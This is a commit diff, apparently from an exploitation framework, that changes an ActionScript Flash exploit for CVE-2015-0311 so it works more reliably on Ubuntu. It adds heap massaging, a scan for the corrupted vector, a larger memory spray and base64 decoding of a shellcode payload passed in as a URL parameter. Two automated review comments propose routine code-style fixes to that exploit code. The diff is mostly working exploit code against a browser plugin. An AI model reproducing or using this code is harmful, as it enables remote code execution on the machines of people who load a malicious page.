Land #5417, Improve reliability for CVE-2015-0311 on Ubuntu
commit
b7f9d28976
Binary file not shown.
|
@ -26,15 +26,20 @@ package
|
|||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:String
|
||||
private var platform:String
|
||||
private var massage:Vector.<Object> = new Vector.<Object>(10000)
|
||||
|
||||
public function Exploit()
|
||||
{
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
payload = b64.toByteArray().toString();
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
|
||||
// defrag
|
||||
for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
|
||||
for (var i:uint = 0; i < massage.length / 2; i++) {
|
||||
massage[i] = new Vector.<uint>(0x3e0)
|
||||
}
|
||||
|
||||
for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
|
||||
ba.compress()
|
||||
|
@ -44,8 +49,10 @@ package
|
|||
try {
|
||||
ba.uncompress()
|
||||
} catch (e:Error) { }
|
||||
uv = new Vector.<uint>(0x3e0)
|
||||
uv[0] = 0
|
||||
|
||||
for (i = massage.length / 2; i < massage.length; i++) {
|
||||
massage[i] = new Vector.<uint>(0x3e0)
|
||||
}
|
||||
|
||||
var test:uint = li32(0)
|
||||
if (test == 0x3e0) {
|
||||
|
@ -54,6 +61,20 @@ package
|
|||
Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
|
||||
return // something failed
|
||||
}
|
||||
|
||||
|
||||
for (i = 0; i < massage.length; i++) {
|
||||
if (massage[i].length == 0x3e0) {
|
||||
massage[i] = null
|
||||
} else {
|
||||
Logger.log('[*] Exploit - corrupted vector found at ' + i)
|
||||
uv = massage[i]
|
||||
uv[0] = 0
|
||||
}
|
||||
}
|
||||
|
||||
if (uv.length != 0xffffffff)
|
||||
return
|
||||
|
||||
exploiter = new Exploiter(this, platform, payload, uv)
|
||||
}
|
||||
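Review bot: The space-to-`+` substitution on `b64_payload` in the `Exploit()` constructor carries no comment, and its purpose cannot be read off the code. Presumably the `sh` parameter is URL-decoded before the SWF sees it, which would turn every `+` of the base64 alphabet into a space; if so, a line such as `// sh arrives URL-decoded, so '+' shows up as ' '; restore it before base64 decoding` above `var pattern:RegExp = / /g;` would record that. The constructor runs across all three hunks of this file, with lines between them not shown. Separately, the page lists a binary file changed in the same commit; if that is the rebuilt SWF, it cannot be checked against these sources from the diff, so the description should state how it was produced.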
|
|
|
@ -23,7 +23,7 @@ package
|
|||
private var payload_address:uint
|
||||
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(51200)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(80000)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
|
||||
{
|
||||
|
|
|
@ -7,13 +7,10 @@ package
|
|||
|
||||
public static function alert(msg:String):void
|
||||
{
|
||||
if (DEBUG == 0)
|
||||
return
|
||||
|
||||
var str:String = "";
|
||||
str += msg;
|
||||
|
||||
trace(str);
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("alert", str);
|
||||
|
@ -22,13 +19,10 @@ package
|
|||
|
||||
public static function log(msg:String):void
|
||||
{
|
||||
if (DEBUG == 0)
|
||||
return
|
||||
|
||||
var str:String = "";
|
||||
str += msg;
|
||||
|
||||
trace(str);
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("console.log", str);
|
||||
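Review bot: `alert` and `log` carry the same body and differ only in the JavaScript function name passed to `ExternalInterface.call`, so the `if (DEBUG == 0) return` guard has to be kept in step in two places. One private helper taking that name, e.g. `private static function emit(fn:String, msg:String):void`, would leave a single guard for both. The page has lost its +/- markers, so it is not certain which of the `trace(str)` and `if (DEBUG == 1)` lines survive; either way `var str:String = ""; str += msg;` is a plain copy of `msg` and could be dropped. Both functions end outside their hunks.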
|
|